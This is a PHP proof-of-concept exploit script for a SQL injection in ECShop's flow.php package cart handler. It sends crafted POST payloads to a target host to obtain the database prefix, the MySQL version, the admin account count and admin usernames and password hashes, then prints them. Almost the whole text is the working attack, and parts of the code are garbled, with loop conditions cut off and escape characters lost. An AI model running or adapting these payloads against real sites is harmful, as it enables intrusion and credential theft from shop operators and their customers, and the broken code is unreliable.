package.php:
/*
* P.O.C. by xsser - http://www.wooyun.org/bug.php?action=view&id=248
*/
error_reporting(E_ALL & ~E_WARNING);
ini_set('display_errors', '1');
@set_time_limit(0);
hr();
banner();
if (count($argv)
{
usage();
exit;
}
hr();
$host = $argv[1];
$path = $argv[2];
$username = array();
$password = array();
exploit($host, $path);
print "Getting database prefix ...n";
$pre = prefix($host, $path);
define('PRE',$pre);
print "Verifying MySQL Version...n";
$version = version($host, $path);
print "Counting admin user ...n";
$ucount = ucount($host, $path,$version);
print "Admin Users : $ucountn";
for ($i=1;$i
{
print "Injecting username and password for admin $i ...n";
Inject($host, $path,$i,$username[$i],$password[$i],$version);
print "n";
}
hr();
print "*n";
print "* [+] Target Host : $host$pathn";
print "* [+] Admin Founded : $ucountn";
print "*n";
for ($i=1;$i
{
print "* [+] Username : " . $username[$i] . "n";
print "* Passowrd : " . $password[$i] . "n";
print "*n";
}
hr();
function hr()
{
print "****************************************************************************n";
}
function banner()
{
print "* [+] Exploit : ECShop >= 2.7.0 (lib_common.php) Remote SQL Injection *n";
print "* [+] Date : 22-08-2010 *n";
print "* [+] Author : alibaba *n";
print "* [+] QQ : 1499281192 *n";
}
function usage($argv0)
{
hr();
print "* [+] Usage : php package.php *n";
print "* [+] Example : php package.php www.ecshop.com / *n";
print "* [+] Example : php package.php www.ecshop.com /shop/ *n";
hr();
}
function exploit($host, $path)
{
$url = $path . 'flow.php?step=add_package_to_cart';
$data = 'package_info={"package_id":"1'","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (!strrpos($buffer,"MySQL server error report"))
die("No Vulnerability");
else
print "Vulnerability Founded!n";
}
function prefix($host, $path)
{
$url = $path . "flow.php?step=add_package_to_cart";
$data = 'package_info={"package_id":"1 and 1=2 union all select 1,2,1,4,5,6,1,8,9,0 from ecs_admin_user--","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (!strrpos($buffer,"MySQL server error report"))
$pre = 'ecs_';
else
{
preg_match("/FROM `(.+)`.`(.+)package_goods`/i",$buffer,$m);
$pre = isset($m[2])? $m[2] : '';
}
return $pre;
}
function version($host, $path)
{
$url = $path . "flow.php?step=add_package_to_cart";
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/'information_schema.tables' doesn't exist/i",$buffer))
{
print "MySQL Version
return false;
}
else
{
print "MySQL Version >= 5.0n";
return true;
}
}
function ucount($host, $path, $version)
{
$url = $path . "flow.php?step=add_package_to_cart";
if ($version)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer,$m);
}
else
{
$found = false;
$i=0;
while($found==false && $i
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,count(user_name),0x5d) from ' . PRE . 'admin_user),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer))
{
preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer,$m);
$found = true;
}
$i++;
}
}
return $m[1];
}
function Inject($host, $path, $number, &$username, &$password, $version)
{
$number--;
$username = '';
$url = $path . "flow.php?step=add_package_to_cart";
if ($version)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
preg_match("/Duplicate entry '[(.+):(.+)]1' for key/i",$buffer,$m);
}
else
{
$found = false;
$i=0;
while($found==false && $i
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) from ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer))
{
preg_match("/Duplicate entry '[(.+):(.+)]1' for key/i",$buffer,$m);
$found = true;
}
$i++;
}
}
$username = $m[1];
$password = $m[2];
}
function POST($host,$port,$path,$data,$timeout, $cookie='') {
$buffer='';
$fp = fsockopen($host,$port,$errno,$errstr,$timeout);
if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
else {
fputs($fp, "POST $path HTTP/1.0rn");
fputs($fp, "Host: $hostrn");
fputs($fp, "Content-type: application/x-www-form-urlencodedrn");
fputs($fp, "Content-length: ".strlen($data)."rn");
fputs($fp, "Connection: closernrn");
fputs($fp, $data."rnrn");
while(!feof($fp))
{
$buffer .= fgets($fp,4096);
}
fclose($fp);
}
return $buffer;
}
?>
|
评论